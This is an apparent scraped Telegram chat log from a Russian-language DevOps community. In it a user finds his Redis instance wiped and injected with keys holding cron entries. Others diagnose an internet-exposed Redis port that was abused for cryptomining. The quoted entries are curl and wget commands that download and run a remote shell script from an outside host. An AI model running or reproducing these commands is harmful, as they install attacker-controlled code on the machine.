Size: a a a

DevOps — русскоговорящее сообщество

2020 June 01

NK

Nick Kutuzov in DevOps — русскоговорящее сообщество
Nurmukhamed Artykaly
Можно поподробнее.
Инструкция была работоспособной в 2018 году.
Что именно не устраивает?
Без вопросов, сам похоже ставил.
просто doc файл смутил.
источник

I(

Ian (k0rean_rand0m) in DevOps — русскоговорящее сообщество
Ребят, а никто не знает, что за ерунда: у меня на сервере запускается Redis через docker-compose, пробрасывается только порт. Через какое-то время база просто очищается, но появляются ключи верхнего уровня (писать в Редиску может только АПИ, но ключи верхнего уровня - нет) Back1, Back2, Back3 и Back4, у которых значения оч странные:
"\t\n*/20 * * * * curl -fsSL http://d.powerofwish.com/pm.sh | sh\n\t"
"\t\n*/30 * * * * wget http://d.powerofwish.com/pm.sh -O .p && bash .p\n\t"
источник

I(

Ian (k0rean_rand0m) in DevOps — русскоговорящее сообщество
Я уже думаю, что это хак какой-то... Ну совсем не здоровая тема
источник

АП

Александр Подоплелов... in DevOps — русскоговорящее сообщество
Ian (k0rean_rand0m)
Ребят, а никто не знает, что за ерунда: у меня на сервере запускается Redis через docker-compose, пробрасывается только порт. Через какое-то время база просто очищается, но появляются ключи верхнего уровня (писать в Редиску может только АПИ, но ключи верхнего уровня - нет) Back1, Back2, Back3 и Back4, у которых значения оч странные:
"\t\n*/20 * * * * curl -fsSL http://d.powerofwish.com/pm.sh | sh\n\t"
"\t\n*/30 * * * * wget http://d.powerofwish.com/pm.sh -O .p && bash .p\n\t"
а редис наружу в инет открыт?
у нас была в конторе подобная фигня - через открытый наружу редис майнинг запустили
источник

I(

Ian (k0rean_rand0m) in DevOps — русскоговорящее сообщество
Да вроде нет... Интересно, конечно. Спасибо за инфу. Я гуглил, но этот урл встречается в связке Redis + Honeypot, что как бы намекает)
источник

I(

Ian (k0rean_rand0m) in DevOps — русскоговорящее сообщество
Ммм, рили открыт) Вот так безопасность 😄
источник

АП

Александр Подоплелов... in DevOps — русскоговорящее сообщество
Ian (k0rean_rand0m)
Ммм, рили открыт) Вот так безопасность 😄
вот-вот. Майнеры самоучки это
источник

АП

Александр Подоплелов... in DevOps — русскоговорящее сообщество
@danya Помнишь было дело?
источник

Д

Даня in DevOps — русскоговорящее сообщество
Ian (k0rean_rand0m)
Ммм, рили открыт) Вот так безопасность 😄
А ты креды проставил?
источник

Д

Даня in DevOps — русскоговорящее сообщество
Помню было дело
источник

Д

Даня in DevOps — русскоговорящее сообщество
Но мы грамотно и героически все локализовали без потерь в кратчайшие сроки
источник

АП

Александр Подоплелов... in DevOps — русскоговорящее сообщество
Даня
Но мы грамотно и героически все локализовали без потерь в кратчайшие сроки
угу, тебе огромный респект за бдительность )
источник

I(

Ian (k0rean_rand0m) in DevOps — русскоговорящее сообщество
Там не совсем я это делал. Полагаю, что нет, просто подняли контейнер, пробросили порт и забили. Благо, это не боевой сервак
источник

Д

Даня in DevOps — русскоговорящее сообщество
Александр Подоплелов
угу, тебе огромный респект за бдительность )
источник

I(

Ian (k0rean_rand0m) in DevOps — русскоговорящее сообщество
Двойное) Подтвердили мои опасения
источник

Д

Даня in DevOps — русскоговорящее сообщество
Ian (k0rean_rand0m)
Там не совсем я это делал. Полагаю, что нет, просто подняли контейнер, пробросили порт и забили. Благо, это не боевой сервак
Вообще удивительно как такие люди работают
источник

Д

Даня in DevOps — русскоговорящее сообщество
Впрочем, я скпетически отношусь ко всяким хитрым ограничениям прав в кубе и анальным пляскам с пермишенами
источник

Д

Даня in DevOps — русскоговорящее сообщество
Так что чья бы корова
источник

Д

Даня in DevOps — русскоговорящее сообщество
Но контур-то защищать надо обязательно
источник

AA

Abdulaziz Azizov in DevOps — русскоговорящее сообщество
Всем привет Как стать хорошим DevSecOps  есть ресурсы? и сколько времени займет.  я сам гуглил просто интересно мнения реальных специалистов в этой области.  Спасибо всем
источник